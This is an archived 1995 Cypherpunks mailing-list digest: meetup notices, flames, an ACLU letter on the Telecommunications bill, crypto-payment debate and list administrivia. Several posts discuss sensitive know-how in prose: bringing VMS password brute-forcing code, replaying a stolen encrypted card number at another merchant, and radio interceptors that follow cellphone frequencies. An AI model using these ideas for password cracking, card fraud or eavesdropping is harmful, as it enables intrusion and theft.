turner at TeleCheck.com Fri Dec 22 16:23:01 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Sat, 23 Dec 1995 08:23:01 +0800 Subject: Houston C'punk gathering Message-ID: <9512222346.AA01818@mercury.telecheck.com> For C'punks in the Houston area, there will be an informal gathering at Strack's Restaurant, tomorrow at approx. 11:00 a.m. I will attempt to get there a little early, and I will be the one with a red lamborghini countach on the table. Just come up and sit down. Strack's has a breakfast buffet which is reasonably priced, or at least it was the last time I went there. Possible Topics for Discussion: I will also be bringing the encryption algorithms used by VMS (the AUTODIN-II, Purdy with salted input, Purdy (Purdy V) with variable length username, and the Purdy (Purdy S) with additional bit rotation). I have tested these under VMS 6.2 and they seem to work fine, although they could be (and should be) optimized for brute forcing. I will also be bringing some password brute forcing code that utilize the system services to encrypt the password (and punch CPU usage through the roof). It will crack a three character password in under a minute on a loaded AXP 3000LX. I will also be bringing a copy of the infamous _Giant Black Book of Computer Viruses_ by Mark Ludwig. Interesting stuff. Directions (from Houston): Take I-45 North. You will pass 1960 and then will drive though a stretch of road riddled with construction barrels. Do not exit Holzworth, but take the next exit (Louetta). Get on Louetta (you will have to make a right turn and you will be on the overpass), and take the overpass west towards Tomball. You will cross through several intersections, Strack's will be on your left, after you cross Kukendaul (approx. 1-2 miles ahead). If anyone gets lost, or wants more info you can page me at: (713) 866-0989. From perry at piermont.com Fri Dec 22 16:42:50 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 23 Dec 1995 08:42:50 +0800 Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE?? In-Reply-To: <199512222111.NAA24171@jobe.shell.portal.com> Message-ID: <199512222355.SAA04987@jekyll.piermont.com> anonymous-remailer at shell.portal.com writes: > Everyone should ask this question. AT&T can sign-on to a two-page ad, > calling on Congress to balance the budget -- to cut off veterans, and > cut-off women with dependent children just before Christmas. It can > sign on to this, but it can't bother to even offer a scholarship to > the students who helped make its fortunes. It would rather leave the > impression that it freeloads off of other's efforts. > > It's shameful. God, you are annoying Fred, ER, I meant, "Alice". .pm From anonymous-remailer at shell.portal.com Fri Dec 22 16:49:37 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 23 Dec 1995 08:49:37 +0800 Subject: Navy hacked by Air Force? Message-ID: <199512230006.QAA06030@jobe.shell.portal.com> On Fri, 22 Dec 1995, Vin McLellan wrote: > This might be relevant. This is a page from the NCCOSC web site > Thanks for posting this. It was very helpful. > The Naval Command, Control & Ocean Surveillance Center (NCCOSC) > is the U.S. Navy's warfare center for command, control and communication > systems and ocean surveillance and the integration of those systems which > overarch multiplatforms. NCCOSC is based in San Diego, CA. > > Note that NCCOSC recently decided to beef up NCI's user > authentication. See "Current Initiatives." Duly noted ... (as long as it don't lead to a false sense of security) > [* ] NCI net - What it is > > * An enterprise network serving NCCOSC and other communities of interest > * Modelled after the global Internet, logically part of the Internet ... > * Provides ubiquitous high-speed low-delay TCP/IP connectivity throughout > the organization and to the Internet > * Provides dialup access from home or TDY via 1-800 number, including > SLIP and PPP support Betchya that WATS line gets a whole lotta billings to it.

> * MIME adopted as corporate email standard, email systems upgraded > o Many user agents upgraded to MIME compliance > o Testing gateways for interoperability with non-compliant systems > o Performing extensive interoperability tests MIME??!!?? They adopted MIME??!!?? Good grief. This is not good ... not good at all. > * New sites connected > o CINCLANTFLT, Norfolk, VA > o The Pentagon > + BRAC Office > + OSS LAN > + DASN/C3I Oh no ... it's worse ... *sigh* ... no wonder that Newt and Dole had such a grim look on their faces when they emerged from their scheduled one-hour, (went for two) meeting with the US President -- the one that was the day before the freshman congress persons did their incredible end-run on their own leadership. Impressive. Truly. What would have caused both Newt and Dole to flush like they did? Did they demo a hack into the personal e-mail of the Vice-Chairman of the JCS? > * New Web server installed > o "neelix", a Sun SparcServer 1000, installed outside firewall > o "www.nosc.mil" now points at neelix Pretty firewall ... nice firewall ...

> * Enhancing Infrastructure to provide ISDN dialup service Good idea. ISDN dialup provides significant bandwidth. Very significant bandwidth. Almost enought to control a battleship. (If there were any battleships, I mean). > * Upgrading D.C. area connectivity to Metropolitan Fiber service at 10 > Mbps > * Getting sites 100% connected (TCP/IP to every desktop) > * Developing MIME to X.400 gateway for connectivity to DMS world Yep. Perfect. Just what the doctor ordered. TCP/IP to every desktop. And MIME for all. Oh, and to ice the cake, toll-free ISDN dial-ins. Hmm, let's see ... for Christmas Santa ... I'd like a packet-switched network with a public outdial to a toll-free ISDN dial-in ... oh, that and a Gulfstream V under the Christmas tree. What are they going to do next, give everyone some Czechoslovakian C-4? Stick a bit of civilian software into all of this, and let's all have a good look at whether someone can take over something a little more interesting than a battle ship. Like maybe an aircraft carrier?? Gee, that oughta harden their drawers ... Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. P.P.S. Feel free to repost widely ... IW ... c4i-pro ... wherever ... From fc at all.net Fri Dec 22 16:50:20 1995 From: fc at all.net (Fred Cohen) Date: Sat, 23 Dec 1995 08:50:20 +0800 Subject: IW Mailing List iw/951222 (fwd) Message-ID: <9512230004.AA27098@all.net> The following is forwarded from Risks [...s indicate missing regions of text] > --------------------------------------------- > FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) > ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator > ... > Date: Fri, 22 Dec 1995 00:59:09 -0500 > From: RSRMadison at aol.com > Subject: Re: Naval Battleship takeover (Long, RISKS-17.55) > > A message from the InfoWar list noted that: < battleships!!! And there weren't any last September.>> > > As stated, this is true. However, let the record show that the US Navy still > flies the flag daily over 1 commissioned battleship, the USS Arizona, > permanently stationed in Honolulu. > > ... > Date: Fri, 22 Dec 1995 10:53:56 -0500 > From: Bob Brewin > Subject: Re: Naval Battleship takeover (Long, RISKS-17.55) > > Yikes. This story will not die -- it just lives on a Web site at the > Daily Telegraph in London. Having worked for a British news > organization (Reuters) for years, if you believe the Telly story, call > me about a bridge I have for sale. > > The Air Force did not hack the Navy over the Internet. They did it over > a secure network (SIPRNET) which is firewalled from the Internet. > > The Air Force conducted this attack with the Navy's knowledge and > permission. > > The Navy does not have any battleships on active duty. > > The Air Force did not get control of the none-existent battleship. > > Yep. This does have the makings of a legend. > > Bob Brewin editor-at-large (whatever that means) federal computer week > antenna at fcw.com brewin at access.digex.net > ... -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From jya at pipeline.com Sat Dec 23 09:11:00 1995 From: jya at pipeline.com (John Young) Date: Sat, 23 Dec 95 09:11:00 PST Subject: PAN_maw Message-ID: <199512231710.MAA23442@pipe3.nyc.pipeline.com> 12-23-95. WashP: CyberCash this week plans to offer its shares of stock to the public. It is one of a handful of fledgling companies that hope to coin profits by helping others make financial transactions on the Internet. But consumers still worry that hackers on the Internet can ferret out credit card information. CyberCash's technology blocks online seeing of unscrambled credit card numbers. CyberCash and its IPO advisors believe they have developed schemes that will convince lemmings that there is the equivalent of steel-plated armor around their life savings as they vanish into the Internet's mega-panamaW$. "This is the latest Internet digital currency slaughter- offer for fat-fee hacking our Widows and Orphans Ever-Safe Pensions," choraled a split-gut ice-eyed Santanalyst. PAN_maw (5 kb) From perry at piermont.com Fri Dec 22 17:11:48 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 23 Dec 1995 09:11:48 +0800 Subject: Navy hacked by Air Force? In-Reply-To: Message-ID: <199512230006.TAA05018@jekyll.piermont.com> Vin McLellan writes: > Drescher/Cohen/Drescher/Drescher/Cohen/Cohen.... > > I'm new to C'punks, so I don't yet have a grip on the context in > which you consider privacy, property, and other ultimate values. I do > wonder, though: Do you spend a lot of time pissin' on each other's shoes > like this? "Dr." Fred Cohen is a bit of a local pariah. We don't like him much, and we all pretty much agree that he's an obnoxious weenie (except the mysterious anonymous "Alice de Nonymous"). I don't know Drescher. This stuff isn't what this mailing list is for... Perry From anonymous-remailer at shell.portal.com Fri Dec 22 19:39:44 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 23 Dec 1995 11:39:44 +0800 Subject: CFS and Linux Message-ID: <199512230317.TAA19444@jobe.shell.portal.com> > 1: please make it install 'out-of-the-box' on Linux. AT&T's refusal to support CFS and other so-called "secure" software under Linux is typical and to be expected. Linux, the most popular alternative to Microsoft, represents a direct threat to AT&T's bread and butter and to their ability to control the security software market. The fact that the CFS install programme deletes other security software is no accident. We would be foolish to expect them to admit their malice - they will excuse it as a "mistake" or will ignore it altogether. I don't agree with all of the "Gates" character's claims against AT&T, however I think their motives can be summed up in three words: Greed, Greed, Greed. Use their software and you support the giant. Remember their theft from the Berkeley graduate students each time you accept "free" software from this greedy monster. I also do not accept Blaze's cowardly defense of his actions and of his too-comfortable situation; one cannot help but be reminded of the Nazi "just following orders" prattle repeated rote as they were called to answer for their crimes. It rings no less hollow to this day. But I will not condemn him, nor will I call on others to do so, preferring to leave that matter between him and his Maker. Weinstein, of course, is beast of another color, but that will have to wait. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From fc at all.net Fri Dec 22 20:25:08 1995 From: fc at all.net (Fred Cohen) Date: Sat, 23 Dec 1995 12:25:08 +0800 Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE?? In-Reply-To: <199512222355.SAA04987@jekyll.piermont.com> Message-ID: <9512230029.AA27699@all.net> > anonymous-remailer at shell.portal.com writes: > > Everyone should ask this question. AT&T can sign-on to a two-page ad, > > calling on Congress to balance the budget -- to cut off veterans, and > > cut-off women with dependent children just before Christmas. It can > > sign on to this, but it can't bother to even offer a scholarship to > > the students who helped make its fortunes. It would rather leave the > > impression that it freeloads off of other's efforts. > > > > It's shameful. > > God, you are annoying Fred, ER, I meant, "Alice". I hope you don't think I'm Alice - and I don't think Alice's first name is Fred. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From Lynnclu at aol.com Fri Dec 22 20:25:16 1995 From: Lynnclu at aol.com (Lynnclu at aol.com) Date: Sat, 23 Dec 1995 12:25:16 +0800 Subject: ACLU Cyber-Liberties Update, 12/22/95 Message-ID: <951222163250_21785823@emout05.mail.aol.com> ---------------------------------------------------------------- December 22, 1995 ACLU CYBER-LIBERTIES UPDATE A bi-weekly e-zine on cyber-liberties cases and controversies at the state and federal level. ---------------------------------------------------------------- IN THIS ISSUE: * ACLU Letter to U.S. Senators Opposing the Telecommunications Deregulation Bill, S. 652 (H.R. 1555) As Reported by the Conference Committee ---------------------------------------------------------------- FEDERAL PAGE (Congress/Agency/Court Cases) ---------------------------------------------------------------- December 22, 1995 Via Fax Subject: Why the Telecommunications Deregulation Bill, S. 652 (H.R. 1555), As Reported by the Conference Committee Should Be Rejected Dear Senator: The American Civil Liberties Union urges you to vote against S. 652 (H.R. 1555), the telecommunications deregulation bill as reported by the conference committee. The conference committee has produced a bill that will immediately damage freedom of expression, the bedrock value at the core of the First Amendment and will structure the telecommunications industry so that free speech and privacy are in permanent jeopardy. While the final text is still being written, these provisions are sufficiently destructive that they warrant rejection of the entire bill. Many reasons could be cited why S. 652 should be rejected; we will focus on just three areas where the conferees have needlessly chosen to attack essential First Amendment values. I. The "Deregulation" Bill Will Establish a Big Government Censorship Regime with New Speech Crimes for the Internet and Online Communications. Title V of the telecommunications bill as adopted by the conference committee will: - Subject first-year college students under 18 to two years in prison and $100,000 fine if they engage in overly salacious dating patter online (even in their private e-mail). - Subject parents to the same prison term and fine if they provide their own teen-ager with online materials that the parents have decided have merit if the material is deemed to violate the bill. - Subject adults merely looking on their own home computer at something deemed obscene to prison for five years for the first peek, plus another ten years if they look again. This is not far-fetched. Electronic "footprints" are left behind whenever a user goes somewhere in cyberspace. Some of the censorship groups backing the bill openly support prosecuting anyone who looks at such material as way of "drying up" demand for it -- so these groups have an incentive to pressure prosecutors to follow those footprints back to the adults at home. - Effectively reduce voluntary communications among consenting adults to those appropriate only for children. Much of what consenting adults -- even married consenting adults -- prize about some of their communications could well be deemed by outsiders as indecent if addressed to minors. The bill will infantalize all communications in cyberspace as users worry about how to avoid prosecution if prohibited material is sought out by someone underage. The educational value of the Internet would be reduced to the equivalent of the children's section in the video store. - Define its new speech crimes so broadly that it will hold access and service providers criminally liable for content they did not create unless the providers have legal departments large and skilled enough to utilize limited and vague defenses. Even then, the defenses would have to be established in costly and time-consuming court proceedings. The predictable effect will be enormous self-censorship, coerced by the government's failure to precisely define what is being made criminal and the threat of prison for transgressors. - Subject all Americans to the most narrow of community standards found in the most socially limiting of locations. Even those who have chosen to adopt the social mores of such locations should not insist on imposing those mores on the millions of Americans who have chosen to live elsewhere. These proposals violate the Constitution. They are also profoundly bad public policy. Title V of the bill is unconstitutional because it takes speech protected by the First Amendment and tries to regulate it in a way that violates what the Supreme Court has said must be the touchstone for regulating protected speech. For example, the bill fails to use the constitutionally required "least restrictive means" to obtain its putative goals. It also fails to take into account the particular characteristics of interactive media in the online environment, rendering its attempt to create new speech crimes constitutionally impermissible. Title V also unconstitutionally invades the privacy rights of those who communicate online. Cyberspace is the first genuinely mass medium in human history, where many individuals can speak to many others at the same time, and where the "start-up" costs of "publishing" are so minimal that almost all users are potential publishers. This is a democratic and truly libertarian communications medium without a centralized governing body. There is no network president or standards department, for example, ultimately overseeing everything that is broadcast -- in fact there is no "network" but instead an endless series of independent areas like newsgroups, chat rooms, bulletin boards and web sites. The conference bill tries to force cyberspace into the mold of the old media with a government-dictated, centralized command structure. Cyberspace gives its users -- including parents concerned about their children -- an unprecedented power over what materials are accessed, or not accessed, from their computers. Parents, for example, already have available software and other technology that will let them control what their children access from their computer. Tragically, the conferees have rejected further private sector development of user empowerment technologies. Instead, the conference bill imposes the most restrictive regime of government regulation over content on what should be the least governmentally restricted of all media. In doing so, the bill would strangle cyberspace, violating the free speech and privacy rights of all those who communicate online. The ACLU believes that all adults have the right to choose for themselves what they see or say online. The conferees have chosen to invest a minority of censorship extremists with the coercive power of the criminal law and Federal prison in order to impose on the rest of us their constricted view of what we should say or see. This is a truly historic turning point. Title V of the bill from the conference committee confronts the Congress with a stark choice: - Will the 104th Congress be seen in history as one who stood up for the freedom of communications in cyberspace and the Internet, or will it be counted as a tool of certain censorship groups determined to impose their conception of "proper" speech on all of us? - Will the 104th Congress stand up for the continuing vitality of private sector development of interactive media, or will it impose a big-government bureaucratic regulatory regime on cyberspace and the content of its communications? - Will the 104th Congress stand up for empowering users -- including parents concerned about their children -- to control what material is accessed from their computers, or will it give the coercive power of federal prison sentences to censorship groups who care more about interfering with what other adults see or say than about protecting their own children? II. The "Deregulation" Bill Will Impose a Big-Government Censorship Regime on Television Programming. The conference committee has agreed to V-chip language in S. 652 that will stifle expression on broadcast and cable television and prevent parents from exercising greater control over their children's television viewing habits. The V-chip provision will vest the government, not parents, with control over which television programs make their way to the family television set. The V-chip hardware is technology that will automatically block a program from television reception if it carries a certain encoded rating in its transmission. The encoding would be transmitted on the same signal that currently carries closed captioning information. However, the V-chip requirement does more than simply call for new hardware in television sets; the bill would set up a television rating system driven by government guidelines on content. Although the television industry is given a one-year window to "voluntarily" develop and transmit an encoded ratings scheme for violent, sexual, or indecent programing, the Federal Communications Commission would have the power to reject the industry's system in favor of its own. In this way, the government ultimately decides what content is appropriate for viewing and what is not. The bill calls for the government to form an "advisory committee" to set recommendations for guidelines on rating content, and those guideline will be formally issued by the FCC. Although the V-chip's congressional sponsors have claimed that these guidelines will not be mandatory, the ratings guidelines will surely have a chilling effect on the creative process in television programming. Would producers make a television mini-series about the violent Civil War? Perhaps not, if the broadcast will automatically be blocked from the television sets of countless families who will not have the opportunity to make an independent judgement as to the program's appropriateness. The weightiest and clearest guidelines for content rating would be that of the government. Such chilling of expression by the government violates the First Amendment. The Supreme Court has held that violent expression enjoys full constitutional protection. Furthermore, what would constitute "sexual" expression would be left up to the government's advisory committee or the industry's "voluntary" internal censors. Would a news program or documentary on breast cancer be blocked as "sexual" expression? That answer is yet unclear, but what is clear is that the encoded ratings will block expression fully protected by the First Amendment. Furthermore, the V-chip scheme created by Congress completely shuts out families from the decision making process. Instead, it empowers bureaucrats and television executives to make decisions for parents. Would the V-chip's automatic censors block out such "violent" programs as "Schindler's List," "Roots," or "The Burning Bed"? Other options for true parental control and choice in children's television viewing will be destroyed by the government's V-chip mandate. Private companies have recently developed technology, such as the Telecommander and the TV Guardian, that would empower parents to screen out the programs or stations that they feel are inappropriate for their children. Additionally, there is the possibility of a true "choice chip," which would allow parents to subscribe to the private rating service of their choice, whether run by the National PTA, TV Guide or the Christian Coalition. Technology and initiatives developed by private business will be crushed by the government's mandatory censoring technology and ratings system. The government will step in as a surrogate parent to turn off the television when a child turns to the "wrong" channel. However, the government's version of what is "wrong" might include a documentary, an afterschool special, or other programming that a parent would actually want their child to watch. Thus, the "V" in V-chip is for the government's "victory" over parental control and the First Amendment. III. The Bill Will Foster Communications Monopolies that Stifle Diversity and Free Speech. A core value of the First Amendment's guarantees of free speech and free press is the vital role in preserving liberty played by robust discussion of public issues among a diversity of viewpoints. Unfortunately, the bill undoes much of the existing protection ensuring diversity in points of view by allowing a greater concentration of media. The conference report would, for example, allow the FCC to use waivers so that a single corporation could own the television station, radio station, cable system, newspaper, phone company and Internet access provider in a locality. On the national level, the bill will allow a greater concentration of control over programming sources. No clearer example exists of the destructive impact on free speech such media concentration will have than CNN's recent rejection of advertisements opposing the telecommunications bill itself. CNN's corporate owners, of course, have vital interests generally being advanced by the bill, but the decision to reject opposing ads (followed up by a decision to reject all ads on the bill -- when the issue was generally developing in favor of CNN's owners) is the kind of content control that will only be repeated as media concentration increases. Conclusion The American Civil Liberties Union urges you to oppose the conference version of S. 652 (H.R. 1555), the telecommunications deregulation bill because it will impose new speech crimes on cyberspace and new censorship on television programming, as well as jeopardize the future of free speech in this country by destroying the diversity of media ownership. Sincerely yours, Laura W. Murphy Director Donald Haines Legislative Counsel ---------------------------------------------------------------- ONLINE RESOURCES FROM THE ACLU NATIONAL OFFICE ---------------------------------------------------------------- Stay tuned for news on the ACLU's world wide web site, under construction at http://www.aclu.org/. America Online users should check out our live chats, auditorium events, *very* active message boards, and complete news on civil liberties, at keyword ACLU. ---------------------------------------------------------------- ACLU Cyber-Liberties Update Editor: Ann Beeson (beeson at aclu.org) American Civil Liberties Union National Office 132 West 43rd Street New York, New York 10036 To subscribe to the ACLU Cyber-Liberties Update, send a message to cyber-liberties at aclu.org with "subscribe Cyber-Liberties Update" in the subject line of your message. To terminate your subscription, send a message to cyber-liberties at aclu.org with "unsubscribe" in the subject line. For general information about the ACLU, write to info at aclu.org. ---------------------------------------------------------------- From attila at primenet.com Sat Dec 23 01:16:24 1995 From: attila at primenet.com (attila) Date: Sat, 23 Dec 1995 17:16:24 +0800 Subject: Cypherpunks resumes? In-Reply-To: Message-ID: Dan Harmon wrote: > and pose the question > 'who the fuck are you.?' good choice of expletives.... 'who the fuck are you.?' --nobody, I guess. I have a Piled higher and Deeper in information techniques from Zuerich (undergrad at Harvard in physical chemistry --boring); I've been around since before the dawn of arpa net, probably as long as TCMay --but I've never held a "job"; I've personally coded two 250,000+ line packages which made me more than comfortable, even if one did go down the black hole (and countless other things like the bit-slice firmware to replace the B3500s in missle silos); I have been charged with crypto offenses by the Feds; and, I have been charged with "treasonable" technology export by the Feds; and, a long time aog did more than one tour in USMC special operations in SE Asia --as a BNCO and chopper pilot. Oh, yeah, I forgot, I hold a license to practice before the court in a couple European countries. read the following while playing 'Hotel California' So, who the fuck am I? --just another aging 300 lb gorilla, long haired hippie California freak with an outlaw chopper. So, who am I? Nobody, I guess -just attila. From hal9001 at panix.com Sat Dec 23 01:57:15 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Sat, 23 Dec 1995 17:57:15 +0800 Subject: Cybercash questions... Message-ID: At 13:39 12/22/95, David Klur wrote: > The fraud possibility I see is that Bob could steal Alice's encrypted > credit card number (by sniffing when she buys something at Charlie's > Internet shop). Then, without decrypting it, he could use it (still > encrypted) at Don's Internet shop, and ask Don to ship the goods to > Bob's address. Since Don will not decrypt Alice's card number he will > not know that it is not Bob's card. Cybercash will validate Alice's > card, but will not know that it is really Bob who is the customer. > Don will ship the goods to Bob, and Alice will get a fraudulent charge > on her bill. > > Am I missing something? If when Alice sends her encrypted card number to Charlie, it were encrypted with Charlie's Public Key, then the version that Bob gets is useless if sent to Don (since it will not decrypt with Don's Secret Key into something that when sent to Cybercash will yield Ann's CC# when decrypted with Cybercash's Secret Key). This still leaves the data as valid for use at Charlie unless the actual decrypt by Charlie contains more than just the CC#, so as to flag an "replay" attempt (ie: if the sending of the CC# is in realtime, there could be a check field in there to validate the response as being for the current request) and reject it. From Majordomo at toad.com Sat Dec 23 03:25:58 1995 From: Majordomo at toad.com (Majordomo at toad.com) Date: Sat, 23 Dec 1995 19:25:58 +0800 Subject: Welcome to cypherpunks Message-ID: <9512221333.AA29359@toad.com> -- Welcome to the cypherpunks mailing list! If you ever want to remove yourself from this mailing list, you can send mail to "Majordomo at toad.com" with the following command in the body of your email message: unsubscribe cypherpunks Cypherpunks Mailing List Here's the general information for the list you've subscribed to, in case you don't already have it: About cypherpunks ----------------- I. Administrivia (please read, boring though it may be) The cypherpunks list is a forum for discussing personal defenses for privacy in the digital domain. It is a high volume mailing list. If you don't know how to do something, like unsubscribe, send mail to majordomo at toad.com and the software robot which answers that address will send you back instructions on how to do what you want. If you don't know the majordomo syntax, an empty message to this address will get you a help file, as will a command 'help' in the body. Even with all this automated help, you may still encounter problems. If you get really stuck, please feel free to contact me directly at the address I use for mailing list management: cypherpunks-owner at toad.com Please use this address for all mailing list management issues. Hint: if you try to unsubscribe yourself from a different account than you signed up for, it likely won't work. Log back into your old account and try again. If you no longer have access to that account, mail me at the list management address above. Also, please realize that there will be some cypherpunks messages "in transit" to you at the time you unsubscribe. If you get a response that says you are unsubscribed, but the messages keep coming, wait a day and they should stop. For other questions, my list management address is not the best place, since I don't read it every day. To reach me otherwise, send mail to eric at remailer.net This address is appropriate for emergencies (and wanting to get off the list is never an emergency), such as the list continuously spewing articles. Please don't send me mail to my regular mailbox asking to be removed; I'll just send you back a form letter. Do not mail to the whole list asking to be removed. It's rude. The -request address is made exactly for this purpose. To post to the whole list, send mail to cypherpunks at toad.com If your mail bounces repeatedly, you will be removed from the list. Nothing personal, but I have to look at all the bounce messages. There is no digest version available. There is an announcements list which is moderated and has low volume. Announcements for physical cypherpunks meetings, new software and important developments will be posted there. Mail to cypherpunks-announce-request at toad.com if you want to be added or removed to the announce list. All announcements also go out to the full cypherpunks list, so there is no need to subscribe to both. II. About cypherpunks The cypherpunks list is not designed for beginners, although they are welcome. If you are totally new to crypto, please get and read the crypto FAQ referenced below. This document is a good introduction, although not short. Crypto is a subtle field and a good understanding will not come without some study. Please, as a courtesy to all, do some reading to make sure that your question is not already frequently asked. There are other forums to use on the subject of cryptography. The Usenet group sci.crypt deals with technical cryptography; cypherpunks deals with technical details but slants the discussion toward their social implications. The Usenet group talk.politics.crypto, as is says, is for political theorizing, and cypherpunks gets its share of that, but cypherpunks is all pro-crypto; the debates on this list are about how to best get crypto out there. The Usenet group alt.security.pgp is a pgp-specific group, and questions about pgp as such are likely better asked there than here. Ditto for alt.security.ripem. The cypherpunks list has its very own net.loon, a fellow named L. Detweiler. The history is too long for here, but he thinks that cypherpunks are evil incarnate. If you see a densely worded rant featuring characteristic words such as "medusa", "pseudospoofing", "treachery", "poison", or "black lies", it's probably him, no matter what the From: line says. The policy is to ignore these postings. Replies have never, ever, not even once resulted in anything constructive and usually create huge flamewars on the list. Please, please, don't feed the animals. III. Resources. A. The sci.crypt FAQ anonymous ftp to rtfm.mit.edu:pub/usenet-by-group/sci.crypt The cryptography FAQ is good online intro to crypto. Very much worth reading. Last I looked, it was in ten parts. B. cypherpunks ftp site anonymous ftp to ftp.csua.berkeley.edu:pub/cypherpunks This site contains code, information, rants, and other miscellany. There is a glossary there that all new members should download and read. Also recommended for all users are Hal Finney's instructions on how to use the anonymous remailer system; the remailer sources are there for the perl-literate. C. Bruce Schneier's _Applied Cryptography_, published by Wiley This is required reading for any serious technical cypherpunk. An excellent overview of the field, it describes many of the basic algorithms and protocols with their mathematical descriptions. Some of the stuff at the edges of the scope of the book is a little incomplete, so short descriptions in here should lead to library research for the latest papers, or to the list for the current thinking. All in all, a solid and valuable book. It's even got the cypherpunks-request address. IV. Famous last words My preferred email address for list maintenance topics only is hughes at toad.com. All other mail, including emergency mail, should go to hughes at ah.com, where I read mail much more regularly. Enjoy and deploy. Eric ----------------------------------------------------------------------------- Cypherpunks assume privacy is a good thing and wish there were more of it. Cypherpunks acknowledge that those who want privacy must create it for themselves and not expect governments, corporations, or other large, faceless organizations to grant them privacy out of beneficence. Cypherpunks know that people have been creating their own privacy for centuries with whispers, envelopes, closed doors, and couriers. Cypherpunks do not seek to prevent other people from speaking about their experiences or their opinions. The most important means to the defense of privacy is encryption. To encrypt is to indicate the desire for privacy. But to encrypt with weak cryptography is to indicate not too much desire for privacy. Cypherpunks hope that all people desiring privacy will learn how best to defend it. Cypherpunks are therefore devoted to cryptography. Cypherpunks wish to learn about it, to teach it, to implement it, and to make more of it. Cypherpunks know that cryptographic protocols make social structures. Cypherpunks know how to attack a system and how to defend it. Cypherpunks know just how hard it is to make good cryptosystems. Cypherpunks love to practice. They love to play with public key cryptography. They love to play with anonymous and pseudonymous mail forwarding and delivery. They love to play with DC-nets. They love to play with secure communications of all kinds. Cypherpunks write code. They know that someone has to write code to defend privacy, and since it's their privacy, they're going to write it. Cypherpunks publish their code so that their fellow cypherpunks may practice and play with it. Cypherpunks realize that security is not built in a day and are patient with incremental progress. Cypherpunks don't care if you don't like the software they write. Cypherpunks know that software can't be destroyed. Cypherpunks know that a widely dispersed system can't be shut down. Cypherpunks will make the networks safe for privacy. [Last updated Mon Feb 21 13:18:25 1994] From floyddb at alpha.c2.org Sat Dec 23 03:55:55 1995 From: floyddb at alpha.c2.org (floyddb at alpha.c2.org) Date: Sat, 23 Dec 1995 19:55:55 +0800 Subject: No Subject Message-ID: <199512231130.DAA26556@infinity.c2.org> On Fri, 22 Dec 1995 andr0id at midwest.net (Jason Rentz) wrote: >> >> > >The problem with the Interceptor is that I think it can only receive one >freqency at a time, and it is adjustable by a thumb wheel, not digitally. >This would tend to make changing frequencies at high rates VERY hard. :) >Also it has no frequancy readout, so this means that if you know what freq. >you should be at it is hard to tune in that freq. without searching a little. > Dr0id > > >( Computer Consulting & Management ) >(P.O. Box 421 Cambria, IL 62915-0421) > The demo of the Interceptor I saw seemed to show it jumping from 150 MHz to 450 MHz without any external adjustments, it locked on the strongest signal. Granted, it can only receive one frequency at a time, but there shouldn't be any significant delays when the phone hops a frequency. The Interceptor's frequency readout is a bargraph style LED. The Scout, from what I can see in Optoelectronics' ad doesn't have any frequency controls on it, it does have a digital frequency readout. As far as timing is concerned, the Scout might be less useful because I think it feeds the frequency into the scanner for reception. Most scanners take a significant amount of time to change frequencies. Merry Christmas Floyd D. Barber floyddb at alpha.c2.org Key fingerprint: 8A 98 1F 6B 70 7A FE 24 35 D4 48 CF 9D F6 B0 91 From master at internexus.net Sat Dec 23 05:49:46 1995 From: master at internexus.net (Laszlo Vecsey) Date: Sat, 23 Dec 1995 21:49:46 +0800 Subject: Encrypted script - sort of In-Reply-To: Message-ID: > >A tale I hear is that when HP had to deliver operating system source to > >the french government they stripped all comments and changed all variable > >and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O). > >It still compiled but was 100% useless to human readers. A somewhat useful utility would be one that would compress C code into as small space as possible, stripping out all spaces and making variable names one character a piece when possible. And of course one to expand it back into 'formatted' text, style could even be incorporated. I'm sure a Perl fanatic knows a quick solution... I'm always amazed at how short Perl code is.. :) Anyone care to take care of this utility? From adam at lighthouse.homeport.org Sat Dec 23 05:52:56 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sat, 23 Dec 1995 21:52:56 +0800 Subject: (fwd) Java implementation of secure login protocol Message-ID: <199512230408.XAA27975@homeport.org> Look, Ma! Java code! Real cyph3rpunks, of course, flame each other anonymously. (Incidentally, I got tired of Alice making it to my noise box, and the following seems to work well. Deleting the leading ^ characters would cause all responses to go into the junk box; perhaps a good idea. This is, for those of you who don't recognize it, procmail code. My mail filter of choice for hacking in.) :0B: * ^Alice de 'nonymous * ^P.S. This post is in the public domain. | formail -a "Status: O" >> cjunk > From: greg at qualcomm.com (Greg Noel) > Newsgroups: comp.lang.java,sci.crypt > Subject: Java implementation of secure login protocol > Date: 19 Dec 1995 23:12:52 -0800 > Organization: QUALCOMM, Incorporated; San Diego, CA, USA > Lines: 64 > Message-ID: <4b8d1k$6o9 at qualcomm.com> > NNTP-Posting-Host: guru.qualcomm.com > > Please note that this article is cross-posted both to comp.lang.java and > sci.crypt. If you follow up, please trim the newsgroups appropriately. > > Since a number of people expressed interest, I'm releasing an initial > implementation of a secure login protocol in Java. This is still very > much a work in progress (it's not really even of alpha quality), but > the protocol itself is functional. > > It's intended that the classes in crypto.* and qualcomm.qbs.login.* > live on the client; any other classes needed would be downloaded over > the encrypted link. Hopefully, the client-resident classes will be > few in number and change rarely; they are just intended to bootstrap > up the connection. In the long run, the classes in crypto.* could be > provided by the vendor of the Java VM. > > The distribution consists of two files: > ftp://ftp.qualcomm.com/pub/gnoel/java.login.tar.gz > ftp://ftp.qualcomm.com/pub/gnoel/java.no-export.tar.gz > The first file contains the logic to execute the protocol and launch > the splash screen (see below); it also contains the base classes from > crypto.* but no cryptographic functions. The second file contains the > base classes and the actual implementations of a few cryptographic > functions to demonstrate how the base classes can be 